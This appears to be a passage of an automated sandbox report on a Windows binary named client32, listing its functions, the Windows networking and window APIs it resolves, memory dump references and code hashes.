                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetErrorDlg
                                                                                                                                                    • API String ID: 199729137-3951532234
                                                                                                                                                    • Opcode ID: f513356551359e7bd4f5a7a8a5daac3b85c14d189876eaae01abd3efebcd0797
                                                                                                                                                    • Instruction ID: bb0f91ad71a52f2c8ea5008bfe97f8280f738ce0ae76c424f39eb7b65472cb1d
                                                                                                                                                    • Opcode Fuzzy Hash: f513356551359e7bd4f5a7a8a5daac3b85c14d189876eaae01abd3efebcd0797
                                                                                                                                                    • Instruction Fuzzy Hash: 5BF05EB6A01718AFC714DF99D844E9777ECFB48B20F00861AFA4997601C770E850CBB0
                                                                                                                                                    Function 6CA84ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 6CA84EE4
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA8B3E2,00000000,00000000,00000000,00000000,00000000), ref: 6CA84F11
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: HttpSendRequestA
                                                                                                                                                    • API String ID: 199729137-4278235638
                                                                                                                                                    • Opcode ID: 7714d1f15b768752e75f7eeefbdcc8bb195cb513b1266e14671a9d7491b1ecd3
                                                                                                                                                    • Instruction ID: 3b4adfd808929c1d09de39e0765332e15cc2b986c25dc8ae687effccd6d1f3e3
                                                                                                                                                    • Opcode Fuzzy Hash: 7714d1f15b768752e75f7eeefbdcc8bb195cb513b1266e14671a9d7491b1ecd3
                                                                                                                                                    • Instruction Fuzzy Hash: 41F03AB6A04318AFC714DFA4D844E9777B8FB48721F018A1AF95597600D770E854CBF0
                                                                                                                                                    Function 6CA84DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6CA84DE4
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,6CA89BCE,?,?,?,?), ref: 6CA84E0D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetWriteFile
                                                                                                                                                    • API String ID: 199729137-2273844942
                                                                                                                                                    • Opcode ID: 7d98991b4f98acc742212829e0d3c0b433263d4a255493f8fe9c1092d1a51299
                                                                                                                                                    • Instruction ID: e2678a8955c7855fcd6e8af6cf5ed65fdf6a801726cb3979d107ac106254deba
                                                                                                                                                    • Opcode Fuzzy Hash: 7d98991b4f98acc742212829e0d3c0b433263d4a255493f8fe9c1092d1a51299
                                                                                                                                                    • Instruction Fuzzy Hash: 38F058B2A14328AFC724DFA5D804A9777F8FB48720F00891AFA8697640C671E850CFA1
                                                                                                                                                    Function 6CA84D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 6CA84D44
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA8B392,00000000,0000002B,?,?), ref: 6CA84D6D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetSetOptionA
                                                                                                                                                    • API String ID: 199729137-1247460590
                                                                                                                                                    • Opcode ID: e1808f9b8b517e17e1cd1429833a8cff2c44192be78a725caddb50ca071b2494
                                                                                                                                                    • Instruction ID: f88351983d049813eb5ac8582aed5e0d39f2692fcedbe5bbaecf103ea1aceff4
                                                                                                                                                    • Opcode Fuzzy Hash: e1808f9b8b517e17e1cd1429833a8cff2c44192be78a725caddb50ca071b2494
                                                                                                                                                    • Instruction Fuzzy Hash: 6FF08CB2605728AFCB24CF94D804E9773FCFB48B21F00891AFA5AD7640C671E850CBA0
                                                                                                                                                    Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                                                                    • API String ID: 1134434899-3115850912
                                                                                                                                                    • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                                                    • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                                                                    • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                                                    • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                                                                    Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110151F9
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                                    • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                                                    • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                                                                                    • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                                                                                    • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                                                                                    Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: QueueUserWorkItem
                                                                                                                                                    • API String ID: 199729137-2469634949
                                                                                                                                                    • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                                    • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                                                                    • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                                    • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                                                                    Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread__wcstoi64
                                                                                                                                                    • String ID: *TapiFixPeriod$Bridge
                                                                                                                                                    • API String ID: 1152747075-2058455932
                                                                                                                                                    • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                                                                                    • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                                                                                    • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                                                                                    • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                                                                                    Function 6CA84D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 6CA84D94
                                                                                                                                                    • SetLastError.KERNEL32(00000078,03822B3C,?,6CA8B267,00000000,6CA86BD0), ref: 6CA84DB5
                                                                                                                                                    Strings
                                                                                                                                                    • InternetSetStatusCallback, xrefs: 6CA84D8E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetSetStatusCallback
                                                                                                                                                    • API String ID: 199729137-894424467
                                                                                                                                                    • Opcode ID: 3631d4f3a1b096ea6213b4b69cf8001f9617a2ed42a1389c1affe8bba77f7866
                                                                                                                                                    • Instruction ID: 7c8ba7b287de36736435a8bcfa994d2cac32887cb3a709785ca3488dca44ca18
                                                                                                                                                    • Opcode Fuzzy Hash: 3631d4f3a1b096ea6213b4b69cf8001f9617a2ed42a1389c1affe8bba77f7866
                                                                                                                                                    • Instruction Fuzzy Hash: 29E06572A457246FC7209F99D848A57B7F8FB44725F05851AE985D7600D671E880CBD0
                                                                                                                                                    Function 6CA84C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA84C44
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA8B677,?), ref: 6CA84C61
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetCloseHandle
                                                                                                                                                    • API String ID: 199729137-3843628324
                                                                                                                                                    • Opcode ID: ac8631c01c00439480b800eb10de310ef2c7e2e2b8c126a09ad36162a5e9edc9
                                                                                                                                                    • Instruction ID: 51cb9600f7b4af2eb9f583881f20cfcf3429fd4763886ec55d66e11f7080a5e9
                                                                                                                                                    • Opcode Fuzzy Hash: ac8631c01c00439480b800eb10de310ef2c7e2e2b8c126a09ad36162a5e9edc9
                                                                                                                                                    • Instruction Fuzzy Hash: BCE092B2A057249FC3249FA59804A46B7FCBB24725F05462AE545D7901C670E8848BE0
                                                                                                                                                    Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: FlashWindowEx
                                                                                                                                                    • API String ID: 199729137-2859592226
                                                                                                                                                    • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                                                    • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                                                                                    • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                                                                                    • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                                                                                    Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
